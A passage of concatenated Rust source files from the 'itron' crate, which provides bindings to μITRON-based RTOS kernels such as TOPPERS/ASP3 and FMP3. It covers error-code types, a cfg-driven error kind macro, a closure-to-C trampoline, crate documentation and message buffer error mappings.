pub const fn as_ref(&self) -> MemoryPoolRef<'_> {
self.0
}
}
}
<file_sep>/src/error.rs
//! Error types.
//!
//! Errors indicate exceptional outcomes of system calls. Like most
//! traditional operating systems, they are represented by error codes in
//! μITRON.
//!
//! # Error Kind Types
//!
//! TODO: describe error kind types
//!
//! # Critical Errors
//!
//! The following errors may be escalated to panics or undefined behaviors:
//!
//! - Kernel integrity errors (some cases of `E_SYS` in the TOPPERS
//! kernels).
//!
//! - Memory access permission errors (`E_MACV`) caused by pointers that are
//! supposed to be accessible by the current thread (e.g., pointers referring
//! to local variables).
//!
//! - `E_PAR` caused by invalid timeout values.
//!
use core::{fmt, marker::PhantomData};
#[allow(unused_imports)]
use crate::abi;
/// Target-specific error value that can be categorized as one of the error
/// kinds represented by `Kind`.
#[derive(Clone, Copy, PartialEq, Eq)]
pub struct Error<Kind = ()> {
    // Invariant: `Kind::from_error_code(code)` returns `Some(_)` —
    // established by `new_unchecked`'s safety contract and relied upon by
    // `Error::kind`.
    code: ErrorCode,
    // Zero-sized marker tying this error value to its kind type.
    _phantom: PhantomData<Kind>,
}
/// Trait for [error kind types].
///
/// [error kind types]: super#error-kind-types
pub trait ErrorKind: Copy {
    /// Categorize the specified error code.
    ///
    /// Returns `None` if the error code is invalid in this context.
    fn from_error_code(code: ErrorCode) -> Option<Self>;
}
impl<Kind: ErrorKind> Error<Kind> {
    /// Construct `Error`.
    ///
    /// # Safety
    ///
    /// `Kind::from_error_code(code)` must return `Some(_)`. Otherwise,
    /// [`Self::kind`] will cause an undefined behavior.
    #[inline]
    pub unsafe fn new_unchecked(code: ErrorCode) -> Self {
        // Cheap best-effort validation in debug builds only.
        debug_assert!(Kind::from_error_code(code).is_some());
        Self {
            code,
            _phantom: PhantomData,
        }
    }

    /// Return `Ok(code)` if `code >= 0`; `Err(new_unchecked(code))` otherwise.
    ///
    /// # Safety
    ///
    /// See [`Self::new_unchecked`].
    #[inline]
    pub(crate) unsafe fn err_if_negative(code: abi::ER) -> Result<abi::ER, Self> {
        // `ErrorCode::new` returns `Some` only for negative values.
        if let Some(e) = ErrorCode::new(code) {
            // Safety: Upheld by the caller
            Err(unsafe { Self::new_unchecked(e) })
        } else {
            Ok(code)
        }
    }

    /// Get the error kind.
    #[inline]
    pub fn kind(self) -> Kind {
        // Safety: Upheld by `new_unchecked`'s caller
        unsafe {
            Kind::from_error_code(self.code).unwrap_or_else(|| core::hint::unreachable_unchecked())
        }
    }

    /// Get the error code.
    #[inline]
    pub fn code(self) -> ErrorCode {
        self.code
    }
}
impl<Kind> fmt::Debug for Error<Kind> {
    // Delegate to the inner `ErrorCode`'s `Debug` representation, which
    // prints the symbolic name (e.g., `E_CTX`) when known.
    #[inline]
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        fmt::Debug::fmt(&self.code, f)
    }
}
/// Raw error code.
///
/// Invariant: the wrapped value is always negative (enforced by `new` and
/// required by `new_unchecked`'s safety contract).
#[derive(Clone, Copy, PartialEq, Eq)]
pub struct ErrorCode(abi::NonZeroER);
impl ErrorCode {
    /// Construct an `ErrorCode`.
    ///
    /// Returns `None` if the specified value is not negative.
    #[inline]
    pub const fn new(code: abi::ER) -> Option<Self> {
        if code >= 0 {
            None
        } else if let Some(x) = abi::NonZeroER::new(code) {
            Some(Self(x))
        } else {
            // Unreachable in practice (a negative value is necessarily
            // non-zero); kept for a `const fn`-compatible structure.
            None
        }
    }
    /// Construct an `ErrorCode` without checking if `code` is a valid error
    /// code.
    ///
    /// # Safety
    ///
    /// If `code` is not negative, this function causes an undefined
    /// behavior.
    #[inline]
    pub const unsafe fn new_unchecked(code: abi::ER) -> Self {
        Self(unsafe { abi::NonZeroER::new_unchecked(code) })
    }
    /// Get the numerical value.
    #[inline]
    pub const fn get(self) -> abi::ER {
        self.0.get()
    }
}
impl fmt::Debug for ErrorCode {
    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
        // Resolve a symbolic name for the code where the selected kernel
        // defines one; fall back to the numeric value otherwise.
        let name = match () {
            #[cfg(any(
                feature = "asp3",
                feature = "fmp3",
                feature = "solid_asp3",
                feature = "solid_fmp3"
            ))]
            () => match self.get() {
                abi::E_SYS => Some("E_SYS"),
                abi::E_NOSPT => Some("E_NOSPT"),
                abi::E_RSFN => Some("E_RSFN"),
                abi::E_RSATR => Some("E_RSATR"),
                abi::E_PAR => Some("E_PAR"),
                abi::E_ID => Some("E_ID"),
                abi::E_CTX => Some("E_CTX"),
                abi::E_MACV => Some("E_MACV"),
                abi::E_OACV => Some("E_OACV"),
                abi::E_ILUSE => Some("E_ILUSE"),
                abi::E_NOMEM => Some("E_NOMEM"),
                abi::E_NOID => Some("E_NOID"),
                abi::E_NORES => Some("E_NORES"),
                abi::E_OBJ => Some("E_OBJ"),
                abi::E_NOEXS => Some("E_NOEXS"),
                abi::E_QOVR => Some("E_QOVR"),
                abi::E_RLWAI => Some("E_RLWAI"),
                abi::E_TMOUT => Some("E_TMOUT"),
                abi::E_DLT => Some("E_DLT"),
                abi::E_CLS => Some("E_CLS"),
                abi::E_RASTER => Some("E_RASTER"),
                abi::E_WBLK => Some("E_WBLK"),
                abi::E_BOVR => Some("E_BOVR"),
                abi::E_COMM => Some("E_COMM"),
                _ => None,
            },
            // The stub kernel defines no error-code constants.
            #[cfg(feature = "none")]
            () => None,
        };
        if let Some(name) = name {
            f.write_str(name)
        } else {
            write!(f, "{}", self.get())
        }
    }
}
impl<Kind: ErrorKind> From<Error<Kind>> for ErrorCode {
#[inline]
fn from(x: Error<Kind>) -> Self {
x.code()
}
}
/// Placeholder for error kind variants.
///
/// **Do not refer to this type in your code!**
/// This type exists purely for documentation purposes. This type is replaced
/// with the inhabited type [`Kind`] if the variant is valid for the current
/// target kernel or the uninhabited type [`Never`] otherwise. This technique
/// lets us match against error kinds that do not exist in some kernels without
/// causing a compilation error.
///
/// ```
/// #![feature(exhaustive_patterns)]
/// use itron::error::{Kind, Never};
///
/// enum ExampleError {
///     Error1(Kind),
///     Error2(Never),
///     // displayed as the following in the doc
///     // Error1(MaybeKind),
///     // Error2(MaybeKind),
/// }
///
/// # fn a(error: ExampleError) {
/// // Portable code that handles all kinds
/// match error {
///     // `_` = don't care; the arm is just ignored if the
///     //       error kind does not exist in this kernel
///     ExampleError::Error1(_) => println!("error1"),
///     ExampleError::Error2(_) => println!("error2"),
/// }
///
/// // Portable code that handles some kinds
/// match error {
///     ExampleError::Error2(_) => println!("error2"),
///     _ => println!("other"),
/// }
///
/// // Non-portable code that handles all kinds
/// match error {
///     // `Kind(_)` = assume that the error kind exists;
///     //             raise a compile error if this assumption is broken
///     ExampleError::Error1(Kind(_)) => println!("error1"),
///
///     // (no arm) = assume that the error kind does not exist;
///     //            raise a compile error if this assumption is broken
///     //            (This requires `#[feature(exhaustive_patterns)]` for now.)
/// }
/// # }
/// ```
// Only ever referenced by `#[cfg(doc)]` code paths (see `define_error_kind!`).
pub type MaybeKind = ();
/// Type for error kinds that are valid in the current target kernel.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct Kind(pub __Unstable);
impl Kind {
    /// Construct a `Kind`. The error code is currently unused.
    #[inline]
    pub(crate) fn from_error_code(_: ErrorCode) -> Self {
        Self(__Unstable)
    }
}
/// I haven't decided what to put in [`Kind`].
#[doc(hidden)]
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub struct __Unstable;
/// Indicates that the error kind never occurs in the current target kernel.
// Uninhabited: values of this type cannot exist, so variants holding it can
// never be constructed and match arms for them are statically dead.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum Never {}
/// An internal macro to define error kind types.
///
/// Each variant is declared with a `cfg` predicate stating when it can occur.
/// For every variant the macro emits three mutually exclusive versions: a
/// documentation-only one holding [`MaybeKind`], an inhabited one holding
/// [`Kind`] when the predicate holds, and an uninhabited one holding
/// [`Never`] otherwise.
macro_rules! define_error_kind {
    (
        $( #[$meta:meta] )*
        pub enum $name:ident {
            $(
                $( #[doc = $doc:literal] )*
                #[cfg( $($cfg:tt)* )]
                $variant:ident
            ),*
            $(,)*
        }
    ) => {
        $( #[$meta] )*
        ///
        /// This type is an [error kind type].
        ///
        /// [error kind type]: crate::error#error-kind-types
        #[derive(Debug, Clone, Copy, PartialEq, Eq)]
        pub enum $name {
            $(
                $( #[doc = $doc] )*
                #[doc = ""]
                // TODO: Replace this doc comment with `doc(cfg(...))`, which
                // currently does not work
                #[doc = concat!("<i>Requires</i>: `cfg(", stringify!($($cfg)*), ")`")]
                // Doc builds: show the variant unconditionally as `MaybeKind`.
                #[cfg(doc)]
                $variant(crate::error::MaybeKind),
                // Real builds: inhabited when the predicate holds...
                #[cfg(all(not(doc), $($cfg)* ))]
                $variant(crate::error::Kind),
                // ...uninhabited otherwise, so the variant cannot be built.
                #[cfg(all(not(doc), not( $($cfg)* )))]
                $variant(crate::error::Never),
            )*
        }
    };
}
<file_sep>/Cargo.toml
[package]
name = "itron"
version = "0.1.9"
license = "0BSD"
edition = "2018"
readme = "src/lib.md"
description = "Interface to operating systems based on μITRON and its derivatives."
categories = ["embedded", "no-std", "external-ffi-bindings", "os"]
repository = "https://github.com/solid-rs/itron-rs"
keywords = ["rtos", "toppers", "kernel"]
[features]
default = []
nightly = ["doc_cfg"]
doc_cfg = []
unstable = ["tt-call"]
# --------------------------------------------------------
# Kernel selection
# - Be sure to synchronize this with `build.rs`.
# - Be sure to synchronize this with the "list of enabled features"
# in `crate::abi`.
none = ["dcre", "rstr_task", "messagebuf", "ovrhdr", "subprio",
"pi_mutex", "systim_local", "exd_tsk"]
asp3 = []
solid_asp3 = []
fmp3 = []
solid_fmp3 = []
# --------------------------------------------------------
# Kernel customization
# - Be sure to synchronize this with the "list of enabled features"
# in `crate::abi`.
# Dynamic object creation. Enables owned wrapped types.
dcre = []
# "Restricted" tasks
rstr_task = []
# Message buffers
messagebuf = []
# Overrun handlers
ovrhdr = []
# Subpriorities
subprio = []
# Priority-inheritance mutex
pi_mutex = []
# Processor-local kernel ticks
systim_local = []
# `exd_tsk`
exd_tsk = []
[dependencies]
tt-call = { version = "1.0.8", optional = true }
[dev-dependencies]
compiletest = { version = "0.7", package = "compiletest_rs" }
[package.metadata.docs.rs]
# choose `none` to maximize the wrapper generation.
features = ["doc_cfg", "nightly", "unstable", "none"]
# only build the default target
targets = []
<file_sep>/src/abi/mod.rs
//! C API
//!
//! Note: `doc(cfg(...))` is not used in this module as different kernels might
//! provide different items with conflicting names. This module's documentation
//! might not be useful unless you ran `cargo doc` with an appropriate kernel
//! selection.
//!
//! <i>This documentation has been built with the following Cargo features:
// Make sure the commas are inserted at the right places!
#![cfg_attr(feature = "asp3", doc = "`asp3`")]
#![cfg_attr(feature = "fmp3", doc = "`fmp3`")]
#![cfg_attr(feature = "solid_asp3", doc = "`solid_asp3`")]
#![cfg_attr(feature = "solid_fmp3", doc = "`solid_fmp3`")]
#![cfg_attr(feature = "none", doc = "`none`")]
#![cfg_attr(feature = "dcre", doc = ", `dcre`")]
#![cfg_attr(feature = "rstr_task", doc = ", `rstr_task`")]
#![cfg_attr(feature = "messagebuf", doc = ", `messagebuf`")]
#![cfg_attr(feature = "ovrhdr", doc = ", `ovrhdr`")]
#![cfg_attr(feature = "subprio", doc = ", `subprio`")]
#![cfg_attr(feature = "pi_mutex", doc = ", `pi_mutex`")]
#![cfg_attr(feature = "systim_local", doc = ", `systim_local`")]
#![cfg_attr(feature = "exd_tsk", doc = ", `exd_tsk`")]
//! </i>
#![allow(non_camel_case_types)]
#![allow(unused_imports)]
// One submodule per kernel service category; everything is re-exported flat
// below to mirror the C API's single namespace.
mod error;
mod intr;
mod mempool;
mod sync;
mod system;
mod task;
mod time;
mod types;
pub use self::{error::*, intr::*, mempool::*, sync::*, system::*, task::*, time::*, types::*};
<file_sep>/src/lib.md
Rust interface to interact with operating systems based on μITRON and its derivatives.
## Kernel Selection
This crate exposes a Cargo feature for each supported RTOS kernel
implementation. The following ones are supported:
- `asp3`: [TOPPERS/ASP3](https://toppers.jp/asp3-kernel.html)
- Additional features supported: `dcre` (dynamic object creation), `rstr_task` (restricted tasks), `messagebuf` (message buffers), `ovrhdr` (overrun handlers), `subprio` (task subpriorities)
- `solid_asp3`: TOPPERS/ASP3 with [SOLID] extensions
- Additional features supported: `dcre` (dynamic object creation), `messagebuf` (message buffers), `pi_mutex` (priority inheritance), `exd_tsk` (exit and delete the calling task)
- `fmp3`: [TOPPERS/FMP3](https://toppers.jp/fmp3-kernel.html)
- Additional features supported: `systim_local` (processor-local kernel ticks)
- `solid_fmp3`: TOPPERS/FMP3 with [SOLID] extensions
- Additional features supported: `dcre` (dynamic object creation), `systim_local` (processor-local kernel ticks), `exd_tsk` (exit and delete the calling task)
- `none` (default): Stub implementation that exposes all functions but always panics
It's an error to enable more than one of these features. It's unsafe to specify an incorrect kernel because the ABIs differ between kernels. This crate assumes it's inherently safe to call the specified kernel's API functions (provided the usage is correct). Specifying unsupported features for a given kernel might result in a compiler or linker error¹.
Items are `cfg`-gated according to the selected kernel's supported feature set so that the uses of non-existent features are detected at compile time.
<sub>
¹ TOPPERS kernels' extensions are mutually exclusive, but building the crate documentation should still succeed even if all of them are specified.
</sub>
[SOLID]: https://solid.kmckk.com/SOLID/
## Cargo Features
In addition to the kernel selection features described above, this package
supports the following Cargo features:
- `nightly` enables nightly-only features. Currently, this feature enables the use of [`doc_cfg`] and exposes `itron::time::timeout!`.
- `unstable` enables unstable (in terms of API stability), experimental features that may be changed or removed in the future.
[`doc_cfg`]: https://doc.rust-lang.org/unstable-book/language-features/doc-cfg.html
## API Design
*This section is relevant only when the `unstable` feature is enabled.*
### Object ID Wrappers
Kernel object IDs are encapsulated in opaque wrappers, which can be constructed either by calling the creation methods or by converting from raw object IDs. Although interacting with arbitrary kernel objects do not exhibit memory unsafety by itself, conversion from raw object IDs has to go through `unsafe` calls because the created wrappers could be used to interfere with other code's usage of such objects, breaking its assumptions, possibly violating memory safety. Deleting unowned objects is `unsafe` as well because such objects could be still in use by their actual owners, and the actual owners would touch supposedly-unrelated objects if the IDs were reused. This system, which we call *external object safety*, is related to I/O safety from [a Rust RFC](https://github.com/rust-lang/rfcs/pull/3128) being proposed at the point of writing.
It's allowed to [get] an object ID wrapper for the current task of the current processor. However, the wrapper created in this way must not outlive the originating task.
[get]: crate::task::current
### Kernel Assumed to be Operational
**It's assumed that this crate's functions are called while the kernel is operational** (i.e., `sns_ker` returns `FALSE`). It's up to application programmers to make sure they are not called inside initialization or termination routines.
### Restricted Tasks
If restricted tasks are not enabled by the `rstr_task` feature, **the caller is assumed to be a non-restricted task.** When called from a restricted task, blocking functions can return `E_NOSPT`, which is not handled and will cause undefined behavior if the `rstr_task` feature is not enabled.
<file_sep>/src/closure.rs
//! Closures: `(fn(EXINF), EXINF)`
use crate::abi;
use core::mem::MaybeUninit;
/// A bundle of a function pointer and associated data.
///
/// # Safety
///
/// When calling the function pointer, the second value must be provided as
/// the parameter.
///
/// If the original closure was `!Send`, it can only be called from the creator
/// thread.
// The pointer is `unsafe extern "C"` because safety depends on the caller
// passing the matching `EXINF` value.
pub type Closure = (unsafe extern "C" fn(abi::EXINF), abi::EXINF);
/// Conversion to [`Closure`].
pub trait IntoClosure {
    /// Convert `self` to `Closure`.
    fn into_closure(self) -> Closure;
}
/// Trivial conversion.
impl IntoClosure for (extern "C" fn(abi::EXINF), abi::EXINF) {
    #[inline]
    fn into_closure(self) -> Closure {
        // Destructure and rebuild the pair; the safe `extern "C" fn`
        // pointer coerces to the `unsafe` variant required by `Closure`.
        let (entry, param) = self;
        (entry, param)
    }
}
/// # Example
///
/// ```
/// use itron::closure::IntoClosure;
/// let (fp, data) = (|| dbg!()).into_closure();
/// unsafe { fp(data) };
///
/// let captured_value = 42u16;
/// let (fp, data) = (move || { assert_eq!(captured_value, 42); }).into_closure();
/// unsafe { fp(data) };
///
/// let captured_value = &"hello";
/// let (fp, data) = (move || { assert_eq!(*captured_value, "hello"); }).into_closure();
/// unsafe { fp(data) };
/// ```
///
/// The source type must fit in [`abi::EXINF`]:
///
/// ```compile_fail
/// # use itron::closure::IntoClosure;
/// let captured_value = [0usize; 2]; // too large!
/// let _ = (move || { dbg!(captured_value); }).into_closure();
/// ```
///
/// The source type must not contain a reference to a local variable:
///
/// ```compile_fail
/// # use itron::closure::IntoClosure;
/// let captured_value = 42usize;
/// let _ = (|| { dbg!(&captured_value); }).into_closure(); // capturing by reference
/// ```
impl<T: Fn() + Copy + 'static> IntoClosure for T {
    #[inline]
    fn into_closure(self) -> Closure {
        // Make sure `T` fits in `EXINF`; the closure state is smuggled
        // through the kernel as a single machine word.
        trait AssertSize {
            const X: ();
        }
        impl<T> AssertSize for T {
            const X: () = if core::mem::size_of::<T>() > core::mem::size_of::<abi::EXINF>() {
                let zero = 0;
                // compile-time panicking is not stable yet
                #[allow(unconditional_panic)]
                #[allow(non_snake_case)]
                let __T_is_too_large_to_fit_in_EXINF__ = 1 / zero;
                #[allow(clippy::empty_loop)]
                loop {}
            };
        }
        // Force evaluation of the size assertion at monomorphization time.
        let () = <T as AssertSize>::X;
        // Adapter with the C ABI expected by `Closure`; reconstitutes the
        // closure state from the opaque `EXINF` word and invokes it.
        extern "C" fn trampoline<T: Fn() + Copy + 'static>(x: abi::EXINF) {
            // Safety: `x` is a reinterpretation of the original `T`. This
            // function reconstitutes `T` every time it's called, but
            // this is safe because `T: Copy`.
            let t: T = unsafe { core::mem::transmute_copy(&x) };
            t();
        }
        // Makes sure the transmutation source type is large enough to
        // cover `EXINF` as required by `transmute_copy`.
        #[repr(C)]
        struct PadWithZero<T> {
            x: MaybeUninit<T>,
            zero: MaybeUninit<abi::EXINF>,
        }
        (trampoline::<T>, unsafe {
            core::mem::transmute_copy(&PadWithZero {
                x: MaybeUninit::new(self),
                zero: MaybeUninit::uninit(),
            })
        })
    }
}
<file_sep>/src/messagebuffer.rs
//! Message buffers
use core::{convert::TryInto, fmt, marker::PhantomData, mem::MaybeUninit};
use crate::{
abi,
error::{Error, ErrorCode, ErrorKind, Kind},
time::Timeout,
};
define_error_kind! {
    /// Error type for [`MessageBufferRef::send`].
    pub enum SendError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// The message is too large (`E_PAR`, NGKI3364).
        #[cfg(not(feature = "none"))]
        BadParam,
        #[cfg(any())]
        AccessDenied,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A termination request was raised for the task (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The object was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
        Deleted,
    }
}
impl ErrorKind for SendError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // Map the raw kernel error codes that `snd_mbf` can produce to
        // `SendError` variants; any other code yields `None`.
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::send_timeout`].
    pub enum SendTimeoutError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// The message is too large (`E_PAR`, NGKI3364).
        #[cfg(not(feature = "none"))]
        BadParam,
        #[cfg(any())]
        AccessDenied,
        /// The operation timed out (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A termination request was raised for the task (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The object was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
        Deleted,
    }
}
impl ErrorKind for SendTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_PAR` for invalid timeout is considered critical; the
            // `E_PAR` arm below is for the message-size case.
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::try_send`].
    pub enum TrySendError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        /// The message is too large (`E_PAR`, NGKI3364).
        #[cfg(not(feature = "none"))]
        BadParam,
        #[cfg(any())]
        AccessDenied,
        /// Polling failed, i.e., the buffer is full (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}
impl ErrorKind for TrySendError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // `psnd_mbf` never blocks, so the wait-related codes (`E_RLWAI`,
        // `E_RASTER`, `E_DLT`) are absent here.
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_PAR => Some(Self::BadParam(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::recv`].
    pub enum RecvError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A termination request was raised for the task (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The object was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
        Deleted,
    }
}
impl ErrorKind for RecvError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // Map the raw kernel error codes that `rcv_mbf` can produce to
        // `RecvError` variants; any other code yields `None`.
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::recv_timeout`].
    pub enum RecvTimeoutError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// The task is a restricted task.
        #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
        NotSupported,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// The operation timed out (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
        /// The wait was forcibly released (`E_RLWAI`).
        #[cfg(not(feature = "none"))]
        Released,
        /// A termination request was raised for the task (`E_RASTER`).
        #[cfg(not(feature = "none"))]
        TerminateRequest,
        /// The object was deleted while waiting (`E_DLT`).
        #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
        Deleted,
    }
}
impl ErrorKind for RecvTimeoutError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            // `E_PAR` is considered critical, hence excluded
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), feature = "rstr_task"))]
            abi::E_NOSPT => Some(Self::NotSupported(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RLWAI => Some(Self::Released(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_RASTER => Some(Self::TerminateRequest(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(all(not(feature = "none"), not(feature = "asp3"), feature = "dcre"))]
            abi::E_DLT => Some(Self::Deleted(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::try_recv`].
    pub enum TryRecvError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
        /// Polling failed, i.e., the buffer is empty (`E_TMOUT`).
        #[cfg(not(feature = "none"))]
        Timeout,
    }
}
impl ErrorKind for TryRecvError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        // `prcv_mbf` never blocks, so the wait-related codes are absent.
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_TMOUT => Some(Self::Timeout(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::initialize`].
    pub enum InitializeError {
        /// The operation is not permitted in the calling context (`E_CTX`).
        #[cfg(not(feature = "none"))]
        BadContext,
        /// Invalid object ID (`E_ID`) or the object does not exist (`E_NOEXS`).
        #[cfg(not(feature = "none"))]
        BadId,
        #[cfg(any())]
        AccessDenied,
    }
}
impl ErrorKind for InitializeError {
    fn from_error_code(code: ErrorCode) -> Option<Self> {
        match code.get() {
            #[cfg(not(feature = "none"))]
            abi::E_CTX => Some(Self::BadContext(Kind::from_error_code(code))),
            #[cfg(not(feature = "none"))]
            abi::E_ID | abi::E_NOEXS => Some(Self::BadId(Kind::from_error_code(code))),
            #[cfg(any())]
            abi::E_OACV => Some(Self::AccessDenied(Kind::from_error_code(code))),
            _ => None,
        }
    }
}
define_error_kind! {
    /// Error type for [`MessageBufferRef::info`].
    pub enum InfoError {
